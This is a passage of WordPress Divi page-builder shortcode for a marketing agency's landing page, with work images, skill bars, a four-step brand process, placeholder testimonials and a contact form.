button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.1\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/Artboard-Copy-12.png\" alt=\"digital advertising\" title_text=\"digital advertising\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.1\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" 